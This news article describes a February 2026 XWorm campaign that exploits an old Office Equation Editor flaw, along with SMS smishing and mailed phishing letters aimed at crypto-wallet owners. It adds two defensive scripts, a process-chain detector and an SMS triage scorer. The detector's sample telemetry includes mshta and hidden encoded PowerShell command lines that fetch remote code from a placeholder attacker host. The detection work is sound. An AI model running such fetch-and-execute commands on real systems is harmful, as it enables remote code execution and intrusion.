Phishing Scams Surge With High-Tech And Old-School Tricks

Cybercriminals blend email, SMS, and physical mail tactics to target businesses and individuals as security experts urge vigilance and updated defenses.

Cybersecurity threats are evolving at a dizzying pace, and February 2026 has seen a wave of sophisticated scams targeting both individuals and businesses across the globe. From clever phishing emails and SMS messages to old-fashioned snail mail, attackers are using every trick in the book to steal sensitive information and compromise systems. Recent reports from security researchers and experts highlight the alarming creativity and persistence of these cybercriminals, reminding everyone that vigilance is more important than ever.

On February 16, 2026, security researchers sounded the alarm about a new cyber-espionage campaign that’s weaponizing a familiar foe: the XWorm Remote Access Trojan (RAT). According to Fortinet, this campaign isn’t just another run-of-the-mill malware outbreak. Instead, it’s a carefully orchestrated operation that combines business-style phishing emails with an old Microsoft Office vulnerability—CVE-2018-0802—to breach modern Windows systems.

The phishing emails are masterclasses in deception. They arrive in multiple languages, posing as purchase orders, shipment documents, or payment confirmations, and urge recipients to open a seemingly innocuous Excel add-in file. But opening that file is where the trouble begins. Hidden within is an Object Linking and Embedding (OLE) component, designed specifically to exploit the Equation Editor vulnerability. Once triggered, the attack chain is almost cinematic in its complexity: the document’s shellcode downloads an HTML Application (HTA) file, which then launches PowerShell to retrieve a disguised image file from the internet. Inside that image? A .NET malware module, encoded in Base64, which loads directly into memory—leaving barely a trace on the victim’s hard drive.

The final act is the deployment of XWorm version 7.2, delivered via a process hollowing technique that injects malicious code into a legitimate Msbuild.exe process. The result? Attackers gain full remote control of the compromised computer. They can surveil, steal files, deploy ransomware, or even launch distributed denial-of-service (DDoS) attacks at will. XWorm’s plugin architecture is particularly worrying, offering more than 50 optional modules for credential theft, browser data harvesting, unauthorized remote desktop access, and more. As Fortinet points out, “Even a single open document can give attackers complete control of a system within minutes.”
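The chain described above (document exploit, then an HTA, then PowerShell, then code injected into Msbuild.exe) leaves a distinctive parent/child trail in process-creation telemetry. The following script is an added example written for this page, not code from the article or from Fortinet's report. It works over constructed Sysmon-style events (pid, parent pid, image path, command line) and flags both individual suspicious edges and the full ordered chain. It assumes EQNEDT32.EXE is the Equation Editor host process, which the article does not name, and all sample events, paths and placeholders are constructed.

```python
"""Detect the document -> HTA -> PowerShell -> MSBuild process chain described
above in process-creation telemetry.

All events below are CONSTRUCTED sample data in Sysmon Event ID 1 style
(pid, parent pid, image path, command line); they are not telemetry from the
XWorm campaign. EQNEDT32.EXE is assumed here to be the Equation Editor host
process; the article does not name the binary.
"""
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    pid: int
    ppid: int
    image: str    # full path of the newly created process
    cmdline: str


# Document/exploit host processes that should not normally launch script hosts.
OFFICE_HOSTS = {"excel.exe", "winword.exe", "powerpnt.exe", "eqnedt32.exe"}
SCRIPT_HOSTS = {"mshta.exe", "powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe"}

# Parent -> child edges from the chain in the article; each alone is only a weak signal.
SUSPICIOUS_EDGES = {
    ("mshta.exe", "powershell.exe"): "HTA script host launching PowerShell",
    ("powershell.exe", "msbuild.exe"): "PowerShell spawning MSBuild (process hollowing target)",
}

# Ordered ancestors that, together, match the full chain with high confidence.
CHAIN_SIGNATURE = ["mshta.exe", "powershell.exe", "msbuild.exe"]


def basename(path: str) -> str:
    """Case-insensitive file name from a Windows or POSIX path."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def find_suspicious_edges(events):
    """Return (parent_pid, child_pid, reason) for every suspicious parent/child edge."""
    by_pid = {e.pid: e for e in events}
    findings = []
    for e in events:
        parent = by_pid.get(e.ppid)
        if parent is None:          # parent started before our telemetry window
            continue
        p, c = basename(parent.image), basename(e.image)
        if p in OFFICE_HOSTS and c in SCRIPT_HOSTS:
            findings.append((parent.pid, e.pid, f"{p} spawned script host {c}"))
        elif (p, c) in SUSPICIOUS_EDGES:
            findings.append((parent.pid, e.pid, SUSPICIOUS_EDGES[(p, c)]))
    return findings


def ancestry(events, pid):
    """Image basenames from the earliest known ancestor down to pid (cycle-safe)."""
    by_pid = {e.pid: e for e in events}
    chain, seen = [], set()
    while pid in by_pid and pid not in seen:
        seen.add(pid)
        chain.append(basename(by_pid[pid].image))
        pid = by_pid[pid].ppid
    return chain[::-1]


def contains_in_order(needle, hay):
    """True if every item of needle appears in hay in the same relative order."""
    pos = 0
    for item in hay:
        if pos < len(needle) and item == needle[pos]:
            pos += 1
    return pos == len(needle)


def high_confidence_hits(events):
    """PIDs of msbuild.exe processes whose ancestry matches the whole chain."""
    return [e.pid for e in events
            if basename(e.image) == "msbuild.exe"
            and contains_in_order(CHAIN_SIGNATURE, ancestry(events, e.pid))]


# Constructed sample: one exploit chain plus a developer legitimately building from PowerShell.
SAMPLE_EVENTS = [
    ProcEvent(4000, 700, r"C:\Windows\System32\svchost.exe", "svchost.exe -k DcomLaunch"),
    ProcEvent(4100, 4000, r"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE", "EQNEDT32.EXE -Embedding"),
    ProcEvent(4200, 4100, r"C:\Windows\System32\mshta.exe", "mshta.exe http://ATTACKER-HOST-PLACEHOLDER/update.hta"),
    ProcEvent(4300, 4200, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", "powershell.exe -w hidden -enc BASE64-PLACEHOLDER"),
    ProcEvent(4400, 4300, r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe", "MSBuild.exe"),
    ProcEvent(5000, 1, r"C:\Windows\explorer.exe", "explorer.exe"),
    ProcEvent(5100, 5000, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", "powershell.exe"),
    ProcEvent(5200, 5100, r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe", "MSBuild.exe build.proj"),
]

if __name__ == "__main__":
    for finding in find_suspicious_edges(SAMPLE_EVENTS):
        print("edge:", finding)
    print("full chain:", high_confidence_hits(SAMPLE_EVENTS))
```

The single-edge rules fire on the developer's PowerShell-to-MSBuild build as well, which is why they are treated as low-confidence signals; requiring the ordered mshta, powershell, msbuild ancestry keeps the alert on the exploit chain only. Note that the Equation Editor process is launched by DCOM rather than by Excel itself, so a rule keyed on "Excel spawned mshta" would miss this chain; keying on the Equation Editor host as well closes that gap.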

This campaign is a stark reminder of the dangers posed by legacy software components that remain unpatched. Despite being nearly a decade old, the Equation Editor flaw continues to be exploited because so many organizations have yet to patch or disable the outdated Office executable that contains it. Security experts urge organizations to disable legacy Office components such as the Equation Editor, apply all available patches, and treat unexpected email attachments with a healthy dose of skepticism.

But email isn’t the only battleground. On February 17, 2026, cybersecurity experts in Australia issued fresh warnings about a surge in “smishing” attacks—phishing via SMS texts. As detailed by local news outlets and cybersecurity authorities, these smishing campaigns use deceptive text messages to trick people into handing over personal information or clicking malicious links that can infect their phones with malware. With mobile phones now an extension of daily life, scammers are exploiting SMS to spread their schemes far and wide.

Smishing, a blend of “phishing” and “SMS,” may sound like tech jargon, but it’s a real and growing threat. The messages impersonate trusted entities like Australia Post, DHL, banks, government agencies such as the Australian Taxation Office (ATO), and popular retailers. Common ploys include fake delivery notifications, fraud alerts, prize offers, and requests for sensitive information under the guise of urgent account issues. For example, a message might claim to be from Australia Post about a parcel delivery problem, urging the recipient to click a link. Others mimic banks or the ATO, warning of suspicious activity or recalculated taxable income and asking for personal details.

The scale of the threat is underscored by recent incidents: in 2023, UPS warned customers about smishing messages demanding payment before delivery; during the 2021 Tokyo Olympic Games, scammers used smishing to sell fake event tickets and steal banking information; and in the United States, attackers impersonated the Postal Service to harvest login credentials. Cybersecurity experts stress that opening a text message is generally safe, but clicking suspicious links or downloading attachments can spell disaster.

To reduce risk, users are advised to avoid clicking on links in unsolicited texts, never download attachments from unknown senders, and report suspicious messages as spam. Updating passwords, monitoring bank and credit card statements for unusual activity, and running malware scans with trusted antivirus software are also essential steps. If in doubt, authorities recommend reporting scams through official channels like Scamwatch and contacting your mobile provider.
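The smishing lures described above share a structure: a trusted brand is named, the message carries a link whose host is not that brand's real domain, and the wording pushes for urgent action. The script below, an added example that is not from the article or any of the authorities it cites, triages SMS text for exactly those three signals. The brand-to-domain allowlist is an assumption made for the example (the article names the brands but not their domains), and the sample messages are constructed.

```python
"""Triage incoming SMS text for the smishing patterns described above: a
trusted brand named in the message, a link whose host is not that brand's
real domain, and urgency language.

The brand-to-domain table and the sample messages are ASSUMPTIONS/CONSTRUCTED
for this example; the article names the brands but not their domains.
"""
import re
from urllib.parse import urlparse

# Brand keyword -> domains the brand actually sends from (assumed allowlist).
BRAND_DOMAINS = {
    "auspost": ["auspost.com.au"],
    "dhl": ["dhl.com"],
    "ato": ["ato.gov.au"],
}

URGENCY_TERMS = ("urgent", "immediately", "suspended", "within 24 hours",
                 "action required", "recalculated", "unusual activity")

# Matches links with or without a scheme, as SMS lures often drop "https://".
URL_RE = re.compile(r"(?:https?://)?(?:[a-z0-9-]+\.)+[a-z]{2,}(?:/[^\s]*)?", re.I)


def extract_hosts(text: str):
    """Lower-cased host names of every link-like token in the message."""
    hosts = []
    for match in URL_RE.finditer(text):
        raw = match.group(0)
        if not raw.lower().startswith(("http://", "https://")):
            raw = "http://" + raw          # urlparse needs a scheme to find the host
        host = urlparse(raw).hostname
        if host:
            hosts.append(host.lower())
    return hosts


def under_domain(host: str, domain: str) -> bool:
    """True for the domain itself or any subdomain of it (not for lookalikes)."""
    return host == domain or host.endswith("." + domain)


def triage_sms(text: str) -> dict:
    """Score a message and return verdict, score, link hosts and human-readable reasons."""
    lower = text.lower()
    reasons, score = [], 0
    brands = [b for b in BRAND_DOMAINS if re.search(rf"\b{b}\b", lower)]
    hosts = extract_hosts(text)

    for host in hosts:
        for brand in brands:
            if any(under_domain(host, d) for d in BRAND_DOMAINS[brand]):
                continue                   # link really goes to the brand's domain
            score += 2
            reasons.append(f"link host {host} is not under an official {brand} domain")
            if brand in host:
                score += 1
                reasons.append(f"host {host} embeds the brand name (lookalike domain)")

    urgent = [t for t in URGENCY_TERMS if t in lower]
    if urgent:
        score += 1
        reasons.append("urgency language: " + ", ".join(urgent))

    verdict = "high" if score >= 3 else "medium" if score >= 1 else "clean"
    return {"verdict": verdict, "score": score, "hosts": hosts, "reasons": reasons}


# Constructed sample messages modelled on the lures described in the article.
SAMPLE_MESSAGES = [
    "AusPost: your parcel could not be delivered. Reschedule at https://auspost-redelivery.example/track",
    "ATO: Your taxable income has been recalculated. Confirm your details at ato-refund.example/claim to receive your refund",
    "Your DHL parcel is out for delivery today. Track it: https://www.dhl.com/track",
    "Running late, see you at 7",
]

if __name__ == "__main__":
    for msg in SAMPLE_MESSAGES:
        result = triage_sms(msg)
        print(result["verdict"], result["score"], result["reasons"])
```

The important design choice is `under_domain`: it accepts the brand's domain and its subdomains but rejects hosts that merely contain the brand name, which is how a lookalike such as a hyphenated brand name on a different domain is caught while a genuine tracking link passes. The same check applies to the website or QR-code destination in the physical letters discussed later on this page: a host that is not under the vendor's official domain is the signal, however authentic the branding looks.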

Just when you thought phishing was a purely digital menace, scammers have turned to old-school tactics with a high-tech twist. In early February 2026, reports surfaced of physical phishing letters being mailed to owners of Trezor and Ledger hardware wallets—the gold standard for cold-storage cryptocurrency security. According to cybersecurity expert Dmitry Smilyanets, who highlighted the scam on X, these letters are disturbingly convincing. They feature authentic-looking branding, urgent language, and even advice to never share your seed phrase online—all before directing victims to do exactly that via a malicious website.

The letters claim to come from the support teams at Ledger or Trezor, warning of a “mandatory Authentication Check” or a “critical security update.” Recipients are urged to complete the process by scanning a QR code or visiting a website that closely mimics the official domain. Once there, they’re prompted to enter their 24-word recovery seed phrase. If the victim complies, attackers gain full control of the wallet and can drain all crypto assets in a flash.

What makes this campaign especially insidious is its reliance on data from previous breaches. For example, Ledger’s 2020 breach exposed over 270,000 customer details, including emails, phone numbers, and physical addresses. Scammers have also sent altered Ledger Nano X devices with embedded malware and fake letters from a supposed CEO urging users to migrate their funds. In 2023, hackers compromised Ledger’s Connect Kit software, leading to over $600,000 in stolen assets. These incidents show that historical data leaks and supply-chain attacks are fertile ground for new scams.

Security experts recommend a multi-pronged defense: always verify communications via official channels, never enter seed phrases online, avoid scanning QR codes from unsolicited mail, and store recovery phrases offline. Using two-factor authentication, monitoring for unusual wallet activity, and considering air-gapped or multi-signature wallets can further reduce risk. As the crypto community has learned, even offline communications can be weaponized. Staying skeptical and informed is the best safeguard against these evolving threats.

Across email, SMS, and even the mailbox, cybercriminals are adapting their tactics to exploit every possible weakness. Whether you’re a business user, a crypto investor, or just someone waiting for a package, the message is clear: verify, patch, and be wary of anything unexpected. In the digital age, a little skepticism can go a long way toward keeping your data—and your money—safe.